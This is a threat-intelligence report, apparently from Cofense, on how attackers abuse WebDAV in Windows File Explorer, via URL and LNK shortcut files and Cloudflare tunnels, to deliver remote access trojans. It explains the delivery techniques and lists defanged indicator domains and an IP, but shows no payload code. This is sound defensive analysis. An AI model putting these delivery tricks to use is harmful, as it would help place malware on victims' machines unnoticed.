Abusing Windows File Explorer and WebDAV for Malware Delivery

Cofense Intelligence has identified a growing tactic in which threat actors abuse Windows File Explorer and WebDAV to deliver malware outside of traditional browser-based downloads. By leveraging URL and LNK shortcut files along with Cloudflare Tunnel infrastructure, attackers are disguising remote file servers as seemingly local resources and delivering multi-stage campaigns that frequently end in RAT infections. This report breaks down how the technique works, why it is effective, and what organizations can do to detect and mitigate this evolving threat.

By: Kahng An, Intelligence Team

Cofense Intelligence has been tracking how threat actors are abusing Windows File Explorer’s ability to retrieve remote files over Web-based Distributed Authoring and Versioning (WebDAV), and HTTP-based file management protocol, to trick victims into downloading malware. WebDAV is a relatively unpopular method of file transfer and remote file storage nowadays, but it is natively supported within the Windows File Explorer (though deprecated as of November 2023) as a way of remotely accessing a file server. Because being able to remotely access things on the internet via File Explorer is a relatively unknown functionality to most people, WebDAV is an exploitable way to make people download files without going through a traditional web browser file download. While these TTPs (Tactics, Techniques, and Procedures) have been seen by Cofense as early as February 2024, campaign volume grew in September 2024 and has remained a constant threat since. This report gives an overview of what WebDAV is, how File Explorer can be used to open WebDAV links, and its use in current campaigns.

Key Points

• WebDAV is a legacy network protocol that is accessible via Windows File Explorer but is rarely used by most users. Threat actors can take advantage of this to trick users into downloading or running malware.

• Additionally, WebDAV within File Explorer bypasses web browser security controls by bypassing the browser entirely and may bypass some endpoint detection and response (EDR) security controls by using such an uncommon attack vector.

• Demo instances for Cloudflare Tunnel hosted on trycloudflare[.]com have been abused to host WebDAV servers in multiple, often similar, campaigns seen as early as February 2024.
• Campaigns seen using this tactic tend to use complex chains of multiple different script payloads and legitimate files to deliver remote access trojans (RATs) that are hosted on different WebDAV servers.

• 87% of all Active Threat Reports (ATR) seen with this tactic deliver multiple RATs as final malware payloads. Some of the most popular RATs include XWorm RAT, Async RAT, and DcRAT.
• ATRs capture network and file IOCs of a phishing campaign as well as general behavior and context.
• URL shortcut files and LNK shortcut files are commonly seen in campaigns with this TTP.

WebDAV Overview

WebDAV is a file management protocol that works over HTTP and was popular as a way of easily handling file transfers before cloud file storage services grew in popularity. In practice, WebDAV is intended to be used as a file server, not unlike how FTP or various cloud file storage solutions are used. Notably, WebDAV has the advantage of working over HTTP, meaning it can be used on anything that supports HTTP. However, because of its unpopularity as a legacy protocol, WebDAV is rarely used by the average user. This also leads to a separate problem with lack of awareness that Windows File Explorer can be natively used to access network resources over the internet, such as WebDAV servers.

Understanding WebDAV Links

Part of this report shows how WebDAV servers can be opened via URL links and Windows UNC paths. URL links will often look like standard web URL links, but Windows UNC paths are a Windows-specific system that is most commonly used for file paths such as C:\Program Files\Microsoft. These can also be used to access remote file shares. While the intricacies of how these two link formats are different is out of scope for this report, security analysts should be aware of the two formats.

In this example, assume that there is a WebDAV server with single folder called “My_Files” in the root directory. An example WebDAV URL link may look like the following.

Accessing the same WebDAV server via a UNC path may look like the following. Note how the keyword “DavWWWRoot” is added to refer to the root directory on the WebDAV server.

By default, a WebDAV server accessed via a UNC path will use HTTP over port 80. A port can be specified after the domain name, and the “@SSL” keyword can be used to refer to use HTTPS. The following examples will both use HTTPS to access the WebDAV server.

Using WebDAV on File Explorer

When WebDAV servers are accessed via File Explorer, it will present the server’s file contents not unlike a folder on the local system. This is particularly notable because the only clear indicator that the user is accessing a network resource is in the address bar which shows the server’s IP address or domain name. The following is an image of what File Explorer looks like when connected to a WebDAV server.

[Abusing_Windows_File_Explorer_and_WebDAV_for_Malware_Delivery_Figure1 (1)]

Figure 1: Windows File Explorer connected to a WebDAV server hosted on module-brush-sort-factory[.]trycloudflare[.]com.

WebDAV connections can be invoked on File Explorer via a few different ways. The following is a non-exhaustive list of the most common methods to use WebDAV on File Explorer that are often abused by threat actors.

Direct Linking

When using Windows File Explorer, a user can specify the exact path to a file or folder by using the address bar. This can also be used to connect to network resources by specifying the IP address or domain name of the remote server.

Additionally, the “file[://]” part of URL is used to specify that a link is used for opening a file or folder via the system’s file browser. This is particularly useful to directly reference a particular file or folder by its file path. However, this can also be used to create links that open files or folders on remote servers. The following is an example of a URL set to open a folder hosted on a WebDAV server.

URL Shortcut Files

URL shortcut files (.url) are Windows shortcuts to a specified URL. While intended primarily for accessing websites, the URL field can also be set to open local files by using the file:// URI scheme to open the specified file path in File Explorer. Similarly, this can also be used to access a remote file server. The following is an example of a URL shortcut file that connects to a WebDAV server via File Explorer.

Additionally, URL shortcut files can be used to open files on the WebDAV server. This is particularly useful for running scripts without the user being aware.

An interesting quirk of URL shortcut files is how they can continuously cause DNS lookups when they exist in the file system when the URLs are written with a Windows UNC path. This behavior seems to be triggered whenever Windows Explorer is browsing on the same directory that the URL shortcut file is in. Whenever someone is browsing through a directory that happens to have a URL shortcut file with a UNC path, the file can automatically attempt to ping out to threat actor infrastructure, potentially alerting threat actors that their payload is active on a victim. Figure 2 demonstrates this with a URL shortcut file that has the UNC path \\harbor-microwave-called-teams[.]trycloudflare[.]com\\new. When the directory that contains the file is opened in Windows Explorer, a DNS query is sent out to resolve the domain to 104[.]16[.]231[.]132. Subsequently, a TCP SYN packet is sent to the IP address, incidentally notifying the threat actors that a connection is attempted.

[...]

Original source